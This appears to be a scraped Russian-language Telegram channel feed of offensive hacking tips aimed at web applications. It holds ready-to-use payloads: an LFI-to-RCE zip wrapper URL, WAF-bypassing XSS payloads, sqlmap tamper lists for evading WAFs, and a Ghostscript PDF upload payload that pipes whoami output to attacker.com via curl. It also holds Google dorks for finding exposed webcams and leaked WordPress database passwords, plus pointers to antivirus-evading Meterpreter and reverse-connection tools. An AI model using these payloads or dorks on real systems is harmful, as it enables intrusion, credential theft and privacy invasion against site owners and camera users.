SHADOW:Group
11.5K subscribers
107 photos
47 videos
19 files
823 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
SHADOW:Group
📑 Переходим от LFI к удаленному выполнению кода Статья описывает несколько способов, благодаря которым вы можете получить полноценное RCE на сайтах с LFI. #web #lfi #rce Читать статью
​​📑 Переходим от LFI к удаленному выполнению кода с помощью ZIP-архива

Если веб-сайт с LFI позволяет вам загружать .zip файлы, то для удаленного выполнения кода следует попробовать следующий алгоритм:

1. Создаём .php файл (rce.php);
2. Сжимаем его в архив .zip (file.zip);
3. Загружаем ваш .zip архив на уязвимый веб-сайт;
4. Удаленно выполняем код с помощью:

https://site.com/index.php?page=zip://path/file.zip%23rce.php

#web #lfi #rce
​​🖥 Инструмент для проведения MITM на RDP соединения

Pyrdp создан для проведения MITM атак на RDP и позволяет просматривать RDP-соединения в режиме реального времени или постфактум. Написан на Python3 и имеет открытый исходный код.

Более подробное описание работы можно прочитать в блоге авторов проекта.

Ссылка на GitHub

#soft #rdp #python #mitm
⛅️ Обход Cloudflare WAF

Рабочие на момент публикации полезные нагрузки, для проведения XSS на сайтах с защитой Cloudflare WAF.

<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>

<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme">

#web #xss
📁 Полезная нагрузка XSS из XML файла

Полезную нагрузку для XSS можно разместить в .xml файле. Файл xss.xml в таком случае будет выглядеть так:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

#web #xss
Скрытая_нагрузка_Обходим_антивирус_и_загружаем_Meterpreter_из_памяти.pdf
2.3 MB
📖 Скрытая нагрузка. Обходим антивирус и загружаем Meterpreter из памяти в Windows 10

#malware #av

Инструмент из статьи
Источник
🧨 CVE-2020-35489: Загрузка произвольного файла в плагине Contact Form 7

Свежая критическая уязвимость в одном из самых популярных плагинов для WordPress. На момент публикации статьи минимум 3,5 миллиона сайтов имеют уязвимую версию данного плагина.

#cve #rce

Читать статью
SHADOW:Group
Эксплуатация SSRF для доступа с правами админа Небольшое описание и пример возможностей данной уязвимости на реальном сайте. #web #ssrf Читать статью
🧨 Переходим от Blind SSRF к RCE:

Один из вариантов, при котором мы можем получить удалённое выполнение кода на сайтах с Blind SSRF:

- Находим 'url=' параметр;
- Проверяем на уязвимость к Blind SSRF;
- С помощью SSRF сканируем 127.0.0.1 и находим открытый порт 6379 (Redis)
- Используем Gopherus для генерации вредоносной ссылки для Redis. Если вы не знакомы с этим инструментом, то рекомендую прочитать данную статью.
- RCE

Redis (port-6379) в данном случае выбран в качестве примера. Инструмент позволяет проводить данную атаку для серверов MySQL (port-3306), PostgreSQL(port-5432), FastCGI (port-9000), Memcached (port-11211), Redis (port-6379), Zabbix (port-10050), SMTP (port-25).

#web #ssrf #rce
🦠 Имитация действий пользователя через обратное соединение

Possessor - инструмент, позволяющий получить обратное соединение с использованием техники имитации пользователя, что не является подозрительным поведением для средств защиты.

По сути, основная идея техники заключается в использовании скрытого вторичного рабочего стола для имитации действий пользователя, минуя при этом анализ антивируса. Подробнее про технику можно почитать здесь.

#malware #av

Инструмент на Github
Видео демонстрация
⛔️ Находим и обходим страницы с ошибкой 403 (доступ запрещен)

Небольшой пример по автоматизации поиска и получения доступа к страницам, к которым доступ запрещен:

▫️Для поиска страниц с ответом 403 используем утилиту dirsearch и выполним команду:

python3 dirsearch.py -r -b -u example.com -i 403 -e php,html,json,aspx,sql,asp,js,txt

▫️Полученные страницы помещаем в .txt файл (например 403.txt).
▫️Устанавливаем утилиту 403bypasser и выполняем команду:

for i in $(cat 403.txt); do python3 403bypasser.py https://example.com/ $i ; done

▫️Ждем результатов с ответом 200 или 302.

Для Burp можем использовать инструмент BurpSuite_403Bypasser.

#web
​​🖼 Взлом с помощью картинки. Полезная нагрузка PHP в изображении.

С помощью инструмента php-jpeg-injector можно производить атаки на веб-приложения, которые запускают изображение .jpeg через графическую библиотеку PHP GD.

Инструмент создаёт новый .jpeg файл с полезной нагрузкой PHP. Зараженный .jpeg файл запускается через gd-библиотеку PHP. PHP интерпретирует полезную нагрузку, введенную в jpeg, и выполняет ее.

#soft #web

Ссылка на GitHub
​​📑 Проводим XSS в CSS теге

Для проведения XSS в теге <style> можно использовать следующую полезную нагрузку:

<style>img{background-image:url('javascript:alert(1)')}</style>

Для обхода WAF:

<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>

#web #xss
💉 Значение Tamper в Sqlmap для обхода WAF

Ниже приведён список используемых значений tamper в sqlmap при проведении Blind Sql инъекций и обхода средств защиты веб приложений для различных СУБД (систем управления базой данных):

Пример:

sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-db

▫️Для Mysql,Mssql,Postgresql,Oracle (Blind):
between


▫️Mysql (Blind):
ifnull2casewhenisnull
ifnull2ifisnull


▫️Mysql,Mssql,Postgresql,Oracle (Blind):
charencode


▫️Mysql,Mssql,Postgresql (Blind):
charunicodeencode


▫️Mysql (Blind):
commalesslimit
commalessmid


▫️Mysql (Blind):
escapequotes


▫️UTF-8 (Blind):
apostrophemask
overlongutf8
overlongutf8more


▫️Bypass waf in JSON (Blind):
charunicodeescape


▫️Mysql,Postgresql,Oracle (Blind):
greatest


▫️Cloudfare waf (Blind):
xforwardedfor


#web #sql
​​🎄Друзья, всех с наступающим Новым годом!!🍾

Этот год был не простым для многих из нас, в том числе и для меня. Однако, именно благодаря удаленке и такому необычному режиму был создан этот канал 🤗

Я рад, что за пару месяцев так много человек появилось на канале. Мы делаем друг друга лучше и в новом году канал продолжит радовать вас годным контентом!🥳

А сейчас, желаю всем хорошего отдыха и счастливого Нового года!!!❤️
🪦 Почему умирает ваша сессия Meterpreter? Попробуйте эти исправления..

Большинство причин весьма очевидны, хотя могут быть неизвестны новичкам.

Наибольший же интерес представляет пункт, в котором говорится об обходе антивирусных решений, миграции процесса и обфускации полезной нагрузки.

#redteam #av #malware

Читать статью
​​🔗 Необычный случай обхода файрвола веб-приложения (WAF)

- WAF заблокировал тег <img>;
- Атрибут «src» также блокируется;
- Однако, найденный WAF не блокировал тег <image>;
- Используем нагрузку на скрине ниже и получаем XSS.

Данная нагрузка обходит Dotdefender, Comodo и еще несколько WAF.

#web #xss
​​📂 Просмотр директорий Apache при ошибочной конфигурации сервера

Как показывает практика многие ресурсы допускают подобные ошибки при конфигурации.

При настройке Apache по умолчанию, просмотр каталогов отключен для порта 443 (см. скрин ниже). Однако, если отправить запрос на порт 80 (http, вместо https), обратившись через IP адрес вместо доменного имени, то мы сможем просматривать директории (запрос 2).

Запрос 1:
https://example.com/wp-content/uploads -> 403 Forbidden

Запрос 2:
http://1.1.1.1/wp-content/uploads -> 200 OK

#web
​​🧨 Удаленное выполнение кода при загрузке PDF файла

Если на сайте происходит загрузка файла через ImageMagick, Evince, GIMP, и некоторые другие утилиты для PDF/PS, то в большинстве случаев можно загрузить PDF файл и получить удаленное выполнение кода на сервере отправив запрос:

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl attacker.com/?a=$(whoami|base64)).putdeviceparams
quit

Подробности причин данной уязвимости можно прочитать по ссылке.

#web #rce
🔍 Находим открытые веб-камеры

Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:

allintitle: "Network Camera NetworkCamera"

intitle:"EvoCam" inurl:"webcam.html"

intitle:"Live View / - AXIS"

intitle:"LiveView / - AXIS" | inurl:view/view.shtml

intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp

inurl:axis-cgi/jpg

inurl:"MultiCameraFrame?Mode=Motion"

inurl:/view.shtml

inurl:/view/index.shtml

"my webcamXP server!"

#google
​​🏮 Утилита для поиска и эксплуатации CISCO CVE-2020-3452

Просто вводите название организации и утилита просканирует наличие уязвимости в Shodan, а при ее наличии выполнит эксплойт.

Данная уязвимость имеет высокий уровень опасности и касается межсетевого экрана Cisco ASA.

Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать конфиденциальные файлы.

#cve #soft

Ссылка на GitHub
​​🖇 Чего следует избегать при работе на WordPress

1.- Оставлять настройки по умолчанию.
2.- Допускать отсутствия контроля над публичным контентом и политиками.

Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:

"define('DB_USER'," "define('DB_PASSWORD'," ext:txt

#google #wp #web